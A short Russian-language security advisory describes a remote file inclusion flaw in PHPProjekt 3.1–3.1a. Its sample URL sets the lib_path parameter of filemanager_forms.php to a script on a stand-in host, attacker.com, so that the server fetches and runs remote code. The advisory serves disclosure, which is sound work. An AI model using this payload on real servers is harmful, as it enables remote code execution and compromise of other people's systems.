PHPProjekt — свободно распространяемы пакет для Linux, Unix и Microsoft Windows. 

Уязвимость в PHPProjekt позволяет нападающему
подключать произвольные файлы расположенные на удаленном сервере. Если включенный файл — PHP сценарий, то уязвимость позволяет выполнение произвольного кода. 

Успешная эксплуатация этой проблемы частично зависит от конфигурации PHP на хосте, выполняющем уязвимое программное обеспечение. Если ‘all_url_fopen’ установлен в ‘off’, тогда
конечно использование этой дырки
ограничено. 

Уязвимость найдена в PHPProjekt 3.1-3.1a 

Пример: http://site.com/filemanager/filemanager_forms.php? lib_path=http://attacker.com/nasty/scripts



Оставить мнение